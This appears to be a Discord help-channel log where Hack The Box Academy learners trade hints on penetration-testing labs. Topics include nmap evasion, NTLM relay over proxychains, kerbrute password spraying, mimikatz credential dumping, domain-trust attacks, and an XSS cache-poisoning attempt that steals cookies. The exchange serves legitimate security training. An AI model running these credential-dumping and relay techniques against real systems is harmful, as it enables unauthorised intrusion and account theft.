#modules
ok my bad, that was the first question. I'm guessing something went wrong with the target and hence you got the flag.
and I'll be honest with you, it's definitely not the hardest question, it's very straightforward
Highest rated then and kinda harder since I was writing shell script to prepare the script instead of doing that in ZAP.
??
God. They also taught you about Burp, brother, why not use it?
It's the same-purpose tool, I like ZAP's interface and open-source policy much better. I don't want to know too many tools, instead prefer to get good with one first.
Burp Suite's encoder offers more encoding options than ZAP 😉
Bro wtf
How can I contact someone in authority?
the module has a whole page for one btw
That doesn't help, this needs a lot more enumeration of subdirectories
I see there is no target IP/cgi directory when we fuzz for it, but when we fuzz for a bat file like target IP/cgi/*.bat I find one file. I don't know why that is, since initially simply target IP/cgi returns nothing, like it doesn't exist
it gives a 404, but it's still worth fuzzing anything in the cgi directory if you know it's vulnerable to something
I'm pretty sure they can give a 404 on any page they like even if it exists
Can somebody please help me regarding Burp Suite? I'm facing an issue
just ask it
Ya but when we fuzz THE directories to see what all exists by using ffuf target IP/FUZZ we don't get a target IP/cgi directory
So we will think it doesn't exist, right? so then how will someone know to fuzz for a bat file like ffuf target IP/cgi/*.bat
While the proxy is on in Burp Suite, when I make a request to the web page, it doesn't give a response
When I disable the FoxyProxy extension everything works fine
because it has the exact version for a certain exploit
there's nothing more to it tbh
Same issue on tryhackme Attackbox + VM
we don't help with THM here
You Don't get the captured request?
isn't that the point?
Or the website just lags?
I do, but the web page just got stuck in the browser
u have to forward the request or stop the proxy
Did you look at burpsuite when the website gets stuck?
So the idea behind burpsuite is that it captures the request to the website you enter in the url so that you can see/modify it before sending it, and when you are ready to send it, you press forward to let it go
Okay, now I got it, thanks a lot, actually I'm a beginner
It's like you are a police officer in the street and you stop someone to inspect their car and then let them go when you are done 
Hahahaha this really helped me a lot to understand, thank you so much
Hey guys I need help, do I need to do that in Burp Suite itself? or in my browser?
I'm a little bit stuck ^^
how can I do that, I never did this kind of thing ^^
is it not that in burp suite?
nope
in the SCCM module in the AD path, SCCMhunter is not printing all of the expected output. The pivot is functioning, the nmap scan displays services as expected in the internal network. Not sure if this is just me or not. It returns "connection failed" in the table for the SiteCodes.
If you are on Firefox go to settings and search " proxy "
Or just use foxy proxy like everyone 
I have a Q about the File Transfer module
for example this:
curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
the URL from my host or target host?
This is downloading from the Internet
However if you want to copy the script from your attack box into the target box ( for example the target host doesn't have Internet interface)
Then in your attack box you spin a python server in the directory of the thing you want to transfer
And then go to the target and do
curl -o /path/to/save/file.extension http://your_ip:python_server_port/path/to/file.extension
never used those kinds of things so far, but I found my way ^^
in the examples they used https, so when I use http or https, thanks anyway
Hey guys! I'm having some trouble with the nmap easy lab, even though I feel I have the answer. I did a -A -sV -T4 -Pn <IP> scan and I got the OS name. But for some reason it's still not taking it. Does anyone know if I'm missing anything?
Good day everyone. I noticed in the Active Directory module on the CPTS path that HTB consistently keeps calling inlanefreight.local (root domain) and logisticsfreight.local (tree root domain) a cross forest trust in subsequent sections, even though they are in the same forest, which I think is an intra-forest trust. I think a cross forest trust deals with 2 root domains in different forests. Is there something I am missing
you can use this (sudo nmap <IP> -Pn -sS -v2 -n) to see what port is opened and use (ncat -nv <ip> 22) to grab the flag banner.
I’ll try that, thank you!
lol
it's one word all lowercase
Yeah I tried all of that, thank you though!
A cross forest trust deals with two domains in different forests.
You can find your information with PowerView's Get-ForestTrust:
```text
TopLevelNames            : {FREIGHTLOGISTICS.LOCAL}
ExcludedTopLevelNames    : {}
TrustedDomainInformation : {FREIGHTLOGISTICS.LOCAL}
SourceName               : INLANEFREIGHT.LOCAL
TargetName               : FREIGHTLOGISTICS.LOCAL
TrustType                : Forest
TrustDirection           : Bidirectional
```
You can also get the whole trust relationship information with Get-DomainTrustMapping
thanks. I will add it to my notes. however this relation isn't a cross forest trust, right, but rather intra-forest
I was able to get the answer using sudo nmap <IP> -sV -F -D RND:5 and then checked the OS for port 22. Thank you for the help.
is that the first module you completed?
The quality of the modules is really unmatched. I'm sure you're in for a lot more you'll enjoy.
hey guys I need some help, I'm currently attempting to do the skills assessment for stack-based buffer overflows on windows x86 and I am not 100% sure how to get the assessment.zip onto the rdp machine. I am using the pwnbox
i like scp
scp?
yeah.
please explain 🙂
HTB says 1 day = 8 hours. don't listen to those though, some of those that were longer took me way less time than it said, and vice versa. it really depends on the person and how well they grasp the subject. you can take a lot longer than what it says too if you get stuck which will probably happen. just go at your own pace.
the box doesn't have internet, would it still be able to access the http server?
are you transferring from linux to windows or linux to linux
it's all being done through the instance that htb provides, I tried to go through my Kali VM but the connection keeps getting dropped after I RDP'd into the VM
also after I RDP into the windows VM I can't see any part of my Kali VM so idk how to move stuff from the Kali VM to the windows one I rdp into
what RDP app are you using
xfreerdp
try adding /drive:/home/%user%/Desktop or whatever folder you want to the command, that will create a shared folder you can put files into
so "xfreerdp /drive:/home/%user%/Desktop /u:htb-student /p:Academy_student! /v:x.x.x.x /f" ?
yeah pretty much, it's just another xfreerdp parameter
okay I'll try that out, thank you, and just so I don't goof this up, the %user%, am I replacing that with my host username?
yes, or replace the whole folder path with any other path you want to mount
that was just an example
okay thanks again! I'll try it out and let you know if it worked for me
guys it's not liking any of those commands
What did you try Trippy?
xfreerdp /u:htb-student /p:Academy_student! /v:10.129.47.198 /cert-ignore \ /drive:C:\Users\htb-student,/D:\Downloads/dynamic-resolution/floatbar:sticky:on,default:visible,show:always
xfreerdp /u:htb-student /p:Academy_student! /v:10.129.47.198 /cert-ignore \ /drive:C:\Users\htb-student\home\parrot\Downloads /dynamic-resolution/floatbar:sticky:on,default:visible,show:always
xfreerdp /drive:D:\Downloads /u:htb-student /p:Academy_student! /v:10.129.47.198
xfreerdp /u:htb-student /p:Academy_student! /v:10.129.47.198 /drive:D:\Downloads /f
you don't use the drive of the remote computer
you're sharing from the computer you're using the xfreerdp command
in that case wouldn't this command work? "xfreerdp /u:htb-student /p:Academy_student! /v:10.129.47.198 /cert-ignore \ /drive:C:\Users\htb-student\home\parrot\Downloads /dynamic-resolution/floatbar:sticky:on,default:visible,show:always"
okay so I did that and now I'm RDP'd into the windows VM, how do I get that .zip file in there now?
go to file explorer then my computer
I don't have an option for my computer
okay so I'm assuming that drive at the bottom is for the instance's Parrot OS, I can't get the zip file in there either, even if I try to log into htb through the Parrot VM it thinks I'm a bot so I can't log in
if I try to drag and drop the zip from host to Parrot it gets blocked
well yeah
using your own vm is a lot easier, you can transfer files from your host to your vm, and from the vm to the target
I didn't realize you were trying to transfer things to the pwnbox from your computer
I would love to use my own VM, but it keeps dropping connection after 5 minutes
you could not use the pwnbox and connect your windows machine to the vpn and rdp in that way probably
you didn't have the pwnbox active at the same time as your vm did you?
yeah that was probably the cause of your connectivity issues then, the pwnbox uses the same ip as your vpn would use
ahh I got it moved over, I'm gonna try this! thanks so much man
when sending a curl request is there a way to not get the body to print?
you can output it to a file with -o
wdym
do you just want the headers?
like if I run -v to get more verbose output but don't want my terminal to get filled with the returned html and have to scroll up
I don't think that's really possible unless you grep for certain things
do u just want it not on ur terminal or in a file like supernuts said
Hey guys I am new to this channel, I need a small hint on AD skills assessment part 2, the question I am stuck on is "locate a configuration file containing an mssql connection string". I only need a small nudge. Thanks
you may need to solve the next question before solving this
Guys just a random question how long did it take you guys to complete cpts path (penetration tester path)
you should find a way to gain more control in this machine
depends on your skills/knowledge, time you invest...
Let me check thanks 😊
How long did it take you?
around 3-4 months, but I was giving it a lot of time
I am 3 months in, I alternate between doing modules and doing machines (easy ones to start with) and I'm about 40% in
A few hours a day
How many hours in a day?
sometimes 12+, sometimes 4-5, depends on my mood
90% done in almost 2 months now, but some background helped
Like after the path or mid path
Some background as in?
but sometimes I wasted time overthinking stuff or not understanding the sections
So I ||logged in as the user through impacket-mssqlclient, I enumerated all the databases but did not get anything, I also tried to enable xp_cmdshell but I don't have enough rights to run cmd commands, so what should I do next||
and about the 4 months, I also did some extra modules not included in the path
||you sure you don't have enough perms to run xp_cmdshell||
did you login as the right user?
Which modules?
the ||user is br086||
don't think so
some CBBH and the buffer overflow modules and the hashcat module
Oh
I am currently in infosec path and man it took me 3 weeks to complete the linux fundamentals
did you find the config file?
I enumerated the four databases but did not find anything or miss something I guess
enumerate everything again once u gain access to another user
it's totally okay
which user I only got two users now with passwords
try looking at smb
snaffler is also a useful tool
I ran snaffler but did not get anything
for both users?
nooooooooo
so we have to run it for both users?
yeah because they both have different rights
enumeration is an iterative process
you should find another user using this
got it
refer back to the sql database enumeration notes from previous modules
i just did this, so feel free to dm for some nudges
I forgot this, like whenever we find a new user, we have to enumerate again because this user may have more rights
he was missing a step
ah thought he was already logged in with the cred file
I got it, thank you. I thought Snaffler works like Responder, I did not know it runs with a different user context, it's like how we enumerate smb shares
Thank you!!!
the hint for that step is useful :^)
I thought they were saying that for the sql user, like I can't execute cmd commands but I can read the databases 😦
I know. Not sure if it has means to save the FUZZer? In Zap, I always had to set up the fuzzer anew from scratch which is why I see some advantage in encoding in fishscript, so my list doesn't need to be processed any further and is ready.
anyone else having the proxy time out on the SCCM module - SCCM Site Takeover 1 exercise? Can't get it to connect over mssql + proxychains despite having successful pivot tunnel still active, socks proxy session as SCCM01$ to the target mssql://172.50.0.30, I increased timeouts in proxychains4.conf, double checked the ports and IPs, PetitPotam is successful, the relay is successful - but the mssql session will not open. Used root / sudo shell as it mentioned, not sure what the issue is and I've now rebuilt the setup three times with the same result.
No one experiences this?? Everything just magically works for you? I really need to figure out why it's so slow, and why it constantly just hangs, but not sure what is wrong. Would really appreciate some advice on best practices to make the setup with HTB work. I use my own Kali VM on VirtualBox, and have reset, switched regions, re-downloaded the vpn pack a number of times...
Module: Linux Privilege Escalation
Section: Polkit
Link to section: https://academy.hackthebox.com/module/51/section/1591
Which versions of polkit are vulnerable? And is there a way to check or do I just have to run the poc to find out?
think you just have to run it
couldn't find a version anywhere
Hey Seus Crissed! that's like forever in computeryears 👩🦽
You can read the security advisory (Ubuntu is an example) to find out which version is vulnerable and from which version it has been patched.
https://ubuntu.com/security/notices/USN-5252-1
I'm on the same, did you change RPORT to the one HTB gave you? and did you need to change the FILEPATH?
I'm only getting
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
restart the machine and change the rport, rhost, and filepath
I restarted the machine, changed the rport and rhost to the ones from htb. Tried different filepaths (both standard, /flag.txt and /) but I still get the same output
```text
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
DEPTH      6                yes       Traversal Depth (to reach the root folder)
FILEPATH   /flag.txt        yes       The path to the file to read
Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS     83.136.255.217   yes       The target host(s), see /basics/using-metasploit.html
RPORT      35722            yes       The target port (TCP)
SSL        false            no        Negotiate SSL/TLS for outgoing connections
TARGETURI  /                yes       The base path to the wordpress application
THREADS    1                yes       The number of concurrent threads (max one per host)
VHOST                       no        HTTP server virtual host
```
are you able to open the ip in firefox?
just tested it
yeah
tried again, didn't work... let's try that too
I now tried to do it in the pwnbox and it worked somehow...
Hi,
Yes, it requires setting rhosts, rport and filepath to give the proper target for the exploit. It's great if you managed on your own from the pwnbox. Maybe an issue with the VPN?
Thanks for the help, yes it's very likely the vpn that's causing the error, or my Kali VM. Everything worked as expected except the exploit, so I thought I was the wrong one all along 😭 😂
Yes when starting to learn it's kinda hard to figure out whether exploits don't work or we don't use it correctly
So on the pwnbox, does it also save the flag.txt in a hidden folder of your attacking machine?
Not sure if this is where I post this question if not I'm sorry, but can anyone help me with this and care to explain it? I'm on module 19 section 102. The question I'm stuck on is "Enumerate the hostname of your target and submit it as the answer. (case-sensitive)"
include module name, section name, any solutions you've attempted, etc.
so that others can help you easier
Oh I'm sorry, it's "Network Enumeration With Nma" "Host and Port Scanning"
with Nmap*
I would run sudo nmap the IP -sS -p-
Hey, is it recommended to do the Documenting and Reporting module after the Penetration Testing Process module in the Penetration Tester job role path? because in the "Penetration Testing Process module/Practice section" the author mentioned taking minor technical and non-technical documentation of each module to learn efficiently, but to know how to take that documentation we should complete the Documentation and Reporting module, right?
it's recommended to take the modules in the path in order
the skills assessment for that module requires knowledge acquired from previous modules
it's also focused on documenting during a penetration test rather than general documentation
Hi I am going through the Active Directory module and I am a bit lost on why we need authentication via LDAP when we already have Kerberos? can someone please guide
okay, I thought if I could learn how to perform the step 6 and 7 documentation stuff from the Documentation and Reporting module before continuing, I could complete those tasks while doing each module in the path and learn efficiently. Thank you.
they're two different protocols/services, ldap doesn't handle authentication, kerberos does
ig since the protocols serve different purposes, and in LDAP there is also Simple Authentication which does not involve Kerberos (which comes under SASL Authentication), as you can read in the AD LDAP Authentication part of the corresponding module section (Kerberos, DNS, LDAP, MSRPC).
Ok..so in SASL..user gets authenticated using Kerberos…and then requests via TGS to access LDAP server…LDAP server then uses challenge/response with the user to authorize it and once authorized the user can access the information in AD like users/groups/printers etc via LDAP…
Is this correct process…if not can you share what’s the correct flow
pretty much
technically sasl supports gssapi which is used to interface with kerberos
@next bronze any insights from your side about this please?
thanks a ton !
not too sure what you're asking... you want to write reports for the other modules in the path?
About the technical documentation and non-technical documentation for each module, as mentioned in the Penetration Testing Process module's Practice section, which you can see in the screenshot below that message.
just do the modules and take notes in your own style based on what works for you, that is just a suggestion
okay, Thank you. I thought if i followed those steps/Task mentioned in that section I could learn More effectively.
it could, but how everyone learns is different, do what works for you
ig after completing Kerberos authentication and successfully getting access to the LDAP server via TGS, the challenge/response NTLM authentication will not occur since there is no need.
Ok 👌 thnx !!
Hey, I am doing the NTLM Cross-protocol Relay Attacks part of the NTLM relay attacks module. In the fourth exercise we are supposed to see NTLM authentication attempts from NPORTS over HTTP to relay to LDAP(S), but when I run Responder with all options set to ON I only see SMB authentication coming in.
Running python3 Responder/Responder.py -I ens192 -wPdv with everything in Responder.conf set to ON just to see the authentication attempt coming in
As root of course 🙂
just tried it and it worked for me, you don't have to use any flags for responder
Might have to reset then
tested on EU3
Thanks. I'll pivot 😆
Thanks, On EU3 I see different auths coming in!
someone help, I got tired of this, even the easy lab
that's not how it works @safe robin
You'll have to get to the answer yourself
Also - when asking for help - add which module/section you are working on
try harder and get it worth it mate not like this 😄
With a screenshot, we don't know anything
I did, I've been doing it, I used -d then source port 53 but can't get it
it's the nmap Firewall and IDS/IPS Evasion - Easy Lab
look, 2h of machine lifetime and I'm struggling with one question of the easy lab
Are you working with pwnbox or via your vm?
relax, take a quick break then come back and start from zero, you may be overthinking it OR something is laggy with the lab and u need to reset or smth
pwnbox
maybe
lemme try rq since u mentioned the module
sure
thanks @shell ore
no worries! 😄
@safe robin mate tell me what ur trying to do
also, should we take this to DMs, is it better? to avoid spoiling for others or?
trying to find OS without alerting the administrator
Best to dm, since its a tier1 and you'd spoil 😉
ok DM me
got it
in the port forwarding with netsh. I got the file and 3 names in it. unable to understand the format of the answer
First name last name with a space
Like "john doe"
not case sensitive, so could write JoHn DOe (but why would you)
(PS: john doe is obviously not the answer, take the name you found in the file 🙂 )
there are 3 names.
From my memories, only one is a person's name
Ok, given his last name is funny. But the answer is there.
Worst case try all three. Make sure if you copy paste that there are no spaces AFTER (trailing spaces)
Hey guys I'm doing the skills engagement of the Shells and Payloads module, do you know what I need to use here to go on the internet?
You can use Firefox by opening it from the console
flexing in their own environment lol
Anyone else notice the MSSQL, Exchange, and SCCM Attacks Skill Assessment box is very slow?
anything on this? I have set it up again with the same result: "ConnectionRefusedError: [Errno 11] Connection refused"
I checked the tunnel, still active with rdp box open and agent still connected
forgot to add this in as well, sorry
Hello, I need a nudge about Linux Privilege Escalation Sudo. I'm in the root directory and see the flag.txt, but when I cat it, it shows information about directories and not the actual flag.
hey guys, I've been researching a way to escape restricted shells, but couldn't find a useful resource until now.
here is the output i get: ~$ ls
*** forbidden command: ls
try sudo with proxychains when connecting to the socks connection
it's a root shell
you using the DEV version of impacket?
yeah I think that's your problem, you need to be using the DEV release to make mssqlclient.py work
I tried with the pre-installed one on the pwnbox, as well as cloning the repo they have in the guide
pls help
go to impackets github and install the DEV version. I am pretty sure I had your same issue last week and this solved it.
also this is not installed, impacket is still calling the older libraries
Hello, I need a nudge about Linux Privilege Escalation Sudo. I'm in the root directory and see the flag.txt, but when I cat it, it shows information about directories and not the actual flag.
providing the error would be helpful
```text
[1,1,{"progname":"ncdu","progver":"1.14.1","timestamp":1727277461},
[{"name":"/root","asize":4096,"dsize":4096,"dev":64768,"ino":8194},
{"name":".viminfo","asize":8295,"dsize":12288,"ino":431},
{"name":".bashrc","asize":3106,"dsize":4096,"ino":276},
{"name":"flag.txt","ino":1789},
```
doesn't seem like you're in a real shell
what's the command and what steps did you do
hello all, I am trying to understand how to put in the command for the HTB vpn. I have read this but don't understand how to type it in the VM for it to generate a web browser. Connecting Using VPN
KingKevin@htb[/htb]$ sudo openvpn user.ovpn
did you check gtfobins?
also used this command LFILE=file_to_read
cat "$LFILE"
yes but did you check gtfobins
Using the dev branch. Also, I pasted the cmds for cloning the repo from the section; it should be a venv, looks like it is calling the libraries from where I downloaded it? (/Downloads/PetitPotam/impacket/.impacket)
following the steps there worked for me
ah ok so you installed with pip, then you have to check the network connection, use -debug if not wireshark 
-debug gives basically the same output 😦
your proxychains is timing out
I tried increasing the timeout on the proxychains conf but no luck
is 9050 the correct port
it worked just had to reset the machine
they match
wait maybe I need to open a new shell 😮
so proxychains.conf has 1080 set for 127.0.0.1 socks4 and socks5, tried with each individually first. ntlmrelayx socks proxy is listening on 127.0.0.1 1080. but for some reason proxychains is still calling 9050 ? Not sure how to adjust this if the conf is updated; I tried in a new shell and same result - the relay is still active
send a screenshot of the config file
okay so first mistake was it was calling proxychains.conf and not proxychains4.conf - adjusted that now.
Resolved: it worked with socks5 and editing proxychains.conf, not proxychains4.conf
I have installed VMware and Parrot. When I try to boot grub with my passphrase, I can only press enter, which naturally gives me the wrong password, I can not write a single letter. If I press enter, then all of a sudden I can write, but then it just prompts. What to do?
Is it possible I need an older sharphound version because bloodhound is not unzipping or processing the uploaded .zip file?
if you're using the older version i.e the non docker version, yes
Bloodhound v 4.3.1
Ok thanks
hello everyone, I am pretty much stuck at finding a flag under Public Exploits (Pentesting Basics under the Getting Started section), tried running all the exploits found on metasploit but no session is getting created, please advise
https://academy.hackthebox.com/module/162/section/1572
I need a push on where to start I went through all the files in Obsidian. And it seems to me that I should find the password and login to log in on the WH website. But I couldn't find it in the files.
the creds are the same as rdp
go to that ip and port in your browser
Hey, kind of a stupid question a lil' bit, but are these certifications good to put on a resume?
Hey I'm doing skills assessment 2 of Attacking Common Applications, anyone know how to find the FQDN of a vhost??
Hey guys I need help on the Shells and Payloads module,
I uploaded a webshell but I don't know where I can find it
it should be right in ur face
wdym?
thats the only way to get the login
sometimes you just have to guess what might be the login using context
you don't see a page of backups?
not really ^^
Hey I'm doing skills assessment 2 of Attacking Common Applications, anyone know how to find the FQDN of a vhost??
dm a screenshot of the page
Any help?
Hello, sorry to interrupt but Active Directory Enumeration & Attacks >>> Attacking Domain Trusts - Child -> Parent Trusts - from Linux
looks like it's not working..
Starting the host and trying to connect with ssh returns "Connection refused" and nmap doesn't reveal any 22/tcp open 😦
can you ping the ip?
check your vpn connection
did u look for vhosts?
did you just start the vm? takes a second to be fully online
Waited like 10min, didn't work, restarted the VM and waited 10 min again 😦 still doesn't work
try changing the vpn server and re download the vpn file
would also recommend double checking you're using the right creds for ssh
across a few of the ad modules the password you expect to use to login changes
ran into that myself
stuck with this in Firewall and IDS/IPS Evasion - Medium Lab module
Have you tried all of the possible nmap techniques that the module covered?
you don't need to retake the module, you just need to go through the scan types again
are u sure, cause even the easy one was difficult for me and I took help from acaard
well the module has a cheat sheet with Scanning Options section, go through it and try individual scan types. Do you know what nmap is and what its functionalities are? Not being able to do skill assessment simply means you are overlooking something or just giving up easily. Going through the module again? If you are certain you haven't learned anything then sure.
maybe I'm tired a little
I'll try again, I'm not giving up easily, I need to go through the scan types and more specifically learn about packets
this ids/ips bypass is kweel stuff but it's hard too😂🤌🤌
Maybe it’s for another user🥸
could be, take frequent breaks.
just take a look at the cheat sheet and try them all out individually.
yeah I can do that but I wanna know why certain things happened
hello just joined
yeah need a break i guess
well its solution was also confusing for me, but it worked
why can i not talk in the general section??
I tried a command with ffuf but it fails
dm me
Every windows machine has a certain built-in user
this hint should also suffice
Not sure what I'm missing here. Should be basic, but I get stuck. Metasploit module 39, section 415 (it's the third question, where an old sudo version should be abused - the module that is named Sessions). I have ||tried several exploits for the vulnerable sudo version, including a bash one (that requires the password for the current user, which I don't have), a python exploit that failed, and a C exploit that I could not compile on the target, and that failed when compiling on the attack machine||. What am I missing?
Wym fails? like errors?
no spoilers please.
You’re right sorry got carried away by frustration
remove your chat
Have you tried other file formats?
tried straight up searching for the exploit with the sudo version inside metasploit?
Ah actually not... I'll do that, thank you!
It just hangs, I entered something wrong probably, don't know what
@quick laurel try looking at limited file uploads section
no worries!
U didn't even close the quotes at the end
Did you find the first question?
Yes
I’ll do that, thank you
Done 👍
Thanks a lot, suspected that I totally missed something obvious. Shouldn't try to cross the bridge for water... 😅
heh dw I know how it feels, no worries.
That part is where I'm kinda confused, adding the vhost part
Yes
if I'm using curl and it doesn't work if the URL doesn't include the www., does that just mean the name server doesn't contain the URL without the www., or is something else going on?
Hi guys, I'm trying to perform a port forwarding within meterpreter in the module: Meterpreter Tunneling & Port Forwarding
However, anytime I try to execute the payload built with msfvenom I get a Segmentation Fault error.
I've done chmod +x on the file, I've started the handler and it simply gets closed due to this failure. Has anybody experienced that?
Yup got everything now trying to solve the last question to obtain reverse shell
Alright, then I suppose I was doubting properly. I'll check it out
Yes except the terminology you're using is a little off. It means there's a "www" DNS record for sure. Each record, like "www", can point somewhere different.
Where and how are you executing that payload?
I'm executing it on the pivot, pointing to my VM. The handler is run pointing to 0.0.0.0. (actually I pointed it to my tun0 at first, then thinking I was mistaken I pointed it to 0.0.0.0 after reviewing the chapter)
Ok so depending on Pivot arch (windows or unix) you might have created the payload with the wrong option.
If address was wrong, you'd just get a connection timed out or just nothing. Not a segfault.
If that's not the issue, check that your metasploit is up to date I guess...
But then maybe people more qualified than me can help
When a domain is pointed to an address without any record it's often referred to as a "naked domain". In your scenario there is no assignment (or just no web server at that address), just "www".
Is this a bind or reverse shell?
reverse
but at the same time, I'm not properly grasping why msfvenom is saying that
Is that the internal ip of the pivot host?
hmmm, shouldn't it be my own machine?
It goes to the internal Target-> internal pivot-host ip -> our machine
Shouldn’t you be executing that on the target?
What @safe star said ☝️
Trying to figure it out, because actually I needed to ping sweep from the pivot to the internal target.
Thus, I thought about (not sure whether it's strictly required or not because I suppose you can already ping sweep it freely from the pivot) having a reverse shell from the pivot to my machine and perform a ping / nmap scan from my attack host to the internal target
U can get a meterpreter session using ssh login
Yea, I guess I'm getting a bit confused by all those techniques 😄
In this scenario, I thought about crafting a payload and reversing it to my machine.
At the same time, I guess I could also try with netcat
might be easier
It would be a lot better to just ssh in
yea, mine was mostly practicing, I was wondering why I couldn't achieve it, especially for the error returned above by msfvenom
Yup, much easier.
Or maybe just ssh -D for dynamic port forward and then ping sweep from your machine... That should work too @safe star right? (confirming since I remember being kinda confused too when I did this haha)
Yeah but this is meterpreter, so I was suggesting to use the ssh_login module to get a meterpreter session that way
Yeah of course 🙂 Just wanted to make sure I wasn't spewing an incorrect solution :p Thanks!
Thank you guys 🙂 appreciate the tips!
damn, I think I got what I've forgot
I'm gonna try one last thing and let you know, just FYI 😄
actually im not sure about a ping sweep from our machine because it only accepts tcp connections
so you would need to do a sweep from the pivot host first
aight, I completely forgot to change my msfconsole payload 🥲
that was the reason why it wasn't working
https://academy.hackthebox.com/module/162/section/1572 I have a question. I need to elevate privileges to administrator. Or I can find his password in the public domain.
can i possibly get some help on AD enumeration & attacks skills assessment part 2? i cannot for the life of me transfer kerbrute and powerview onto the windows machine. i've scp'd from the ssh jump box, i scp'd from my linux machine, i scp'd from the windows machine. nothing i'm doing is working. any hints, please?
are you using xfreerdp
if you are using xfreerdp then use /drive:share,.
have you tried python http server or impacket smbserver?
Try to find an extension that is not blacklisted and can execute PHP code on the web server, and use it to read "/flag.txt"
File Upload Attack
Blacklist Filters
im trying all extensions and none of them are working
use the list they linked in the section
i already did it duh
the github repo?
YES
this will share a local directory from you linux to windows remote session
THE SECLIST ONE
Yes, but I had to use ssh -L 13389:172.16.7.50:3389 HTB-studebt@<target IP> in order to get xfreerdp to work.
thats not the only one
I didn't think of that 😒
believe me, i already dont need to try more extensions...
transfer file from you linux to pivot machine, then pivot machine to the target
if you use ligolo-ng to portforward then it will be easier
php2, php3, php4, php6, shtml, htm, html are the allowed ones, but they arent rendering the php code
you tried phtml?
but that is for windows servers
This all depends on what information you have been able to enumerate and if you can use any of the information they provided you. You can DM me where you are, what you know, what you have, etc.
ligolo-ng?
im dealing with linux server
worked just fine for me
the extension isnt any of the ones u just listed
great pivoting tool
The Pivoting Lab SnapLabs template: https://jh.live/pivoting
Free Cybersecurity Education and Ethical Hacking with John Hammond
you will thank me
Never heard of it, but I guess I can give it a shot.
plus this resource
then give me a clue
Awesome, thank you. Let's see how it goes.
Abusing HTTP misconfig - Hard assessment
I poisoned the cache with an RXSS payload that sends the cookie to interactsh
Still I am not getting any response from Admin in logs
i suggest, if u have the time, to redo the pivot skill assessment with it
+1
Do I need to include port in interactsh url, earlier labs didn't require port
are those the only extensions that were allowed to get uploaded?
you might get a better view in burp intruder
Yes, I didn't know that the response extension could execute PHP code; I must have done some research on that with those that were allowed by the server backend. Thanks anyway. By the way, the SecLists wordlist does work.
ik but its full of unneeded extensions
Re: AD Enum > ACL Abuse Tactics — if adunn's password isn't in rockyou.txt (which it isn't, as I already tried it with Hashcat to no avail), then what wordlist is it in?
Never mind, John the Ripper found it. Seems to be my new favorite cracking tool given that it's much more accurate at finding things.
did you put the right format?
Hey anyone knows what payload to use to get a reverse shell at the end of skill assessment 2 in attacking common applications
did u check the version number?
huh, if you are using the same wordlist, shouldn't both tools crack the hash???
Should, but nope. John the Ripper cracks it while Hashcat exhausts, despite using rockyou.txt in both cases. Perhaps my row of 6-year-old GPUs is to blame, but they were working just fine with Hashcat this past spring.
Moving on: why is this happening in the DCSync lab? Any ideas? @cloud urchin?
u should get a reverse shell
already in bash
Mm dnt knw why, i used revshells and created one
Started a netcat listener and all but no revshell got
Cause it asked to get a rev shell and get the flag in the last question
you're talking about the revshells site right?
Yes
there is no need for that when there are automated exploits for the version
Ok
Still curious as to why XRDP is doing this while MSRDP isn't when attempting the AD Enum > DCSync lab, despite attempts to connect using identical syntax in both cases.
same happened to me, had to use remmina
Would KRDC work or not as well?
I used xfreerdp it works just fine
tbh rdp are kinda buggy in academy
not sure, never used it
Wonder if Wayland is the problem then. In my case:
wlfreerdp /u:htb-student /p:'Academy_student_AD!' /w:$(math "3840*0.75") /h:$(math "2160*0.75") /v:$ip
Running Garuda Dr460nized + Plasma 6 + BlackArch tooling on my personal attack machine, for context.
i'm doing the active directory module and i'm trying to use kerbrute with options -o to save the output to a file but its not working its creating an empty file
not sure what's the problem , I always use xfreerdp
you could try piping the output to tee -a out.file
might grab the ascii art and extra stuff tho
i'm trying to grab only the users so i can use them for password spray
use >
this will write everything including time etc can't use to password spray
kerbrute also does this just without the ascii art
use this , then parse yourself , use awk,grep
so u will have to filter
oh i see okay i will try grep then
HELP! Attacking Domain Trusts - Child -> Parent Trusts - from Linux. I desperately need a hint on how I can obtain the NTLM hash for the Domain Admin user bross. I got the shell running, but I am lost from here.
you got DA ?
yes
then you can use one of the attack to get the hash of any user you want
use mimikatz
did you dump hashes?
I think this is where I am getting stuck, am i supposed to be using mimikatz in the shell? and if so, I have the hardest time transferring the tool to the shell
transferring shouldn't be hard , use http or smb
raisechild.py dumped some hashes
i tried both of those, but I can try again and hopefully you can tell me what I am doing wrong
Hey there is there anyone into CTF I have something to discuss
send a screenshot of your command
Sorry if I am middle of some discussion
running this on my attack box:
u will need to do a double transfer
Need some help with the Command Injection skill assessment, just need a point in the right direction
like from the pwnbox, to the attack box, to the shell?
trying now
i came up with this, not sure if there's something simpler: cat valid.txt |grep USERNAME | cut -d ":" -f4 | cut -d "@" -f1 > v.txt
okay
try testing out the parameters
hello guys is there anyone who can give me a hint about the foothold in the Zephyr Pro lab? i have tried a lot of things but i couldnt make it
#welcome and go to the #1263635449335910531
Trying to find the input location
a bit hard to help because there are a lot of parameters but you should be able to find the one
in the url
hello on the password attacks module in the network services i have found the credentials but i cannot connect to the RDP service
i get 'Connection reset by peer' error
any help
ok, i have mimikatz on my attack box:
both these commands aren't working:
now do the same thing but use the internal ip when using downloading from windows
Hi I am on the information Gathering - Web Edition - Skills assessment. I have the answers to all but: What is the API key in the hidden admin directory that you have discovered on the target system? I know where the hidden directory is but I have tried gobuster but I am at a bit of a dead end what to do
the internal ip was tripping me up, i got it on the shell now, thank you!
i tried to use kerbrute with password spray but i get this error ERR_ETYPE_NOSUPP KDC has no support for encryption type
bross isn't listed 😭 what am i doing wrong now?
yoo don't spoil , also try others attack
or just read the output
try sekurlsa
i keep getting this error: mimikatz # sekurlsa::process lsass.exe
Switch to PROCESS
mimikatz # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Key import
did you privilege::debug first
i need NTLM of bross, unless I need to crack the hash of the administrator and then use those creds to enumerate bross?
you got a DA , you can get any NTLM
you just need the right technique , check the ACLs part in the course
checking
oh yeah, then try the method they showed
Update: KRDC doesn't work and Remmina doesn't work either. Going to have to spawn the PwnBox and try it from there.
is it ACL Abuse Tactics?
it's an ACL that is granted for DA
DA is short for Domain Admin right?
yeah
DM me for a nudge
How do hackers access devices through wifi?
just pinged you thanks
ya gpt isn't being helpful, and I'm not sure how to progress with your hints, been at this for close to 3 hours now sadly
magic 
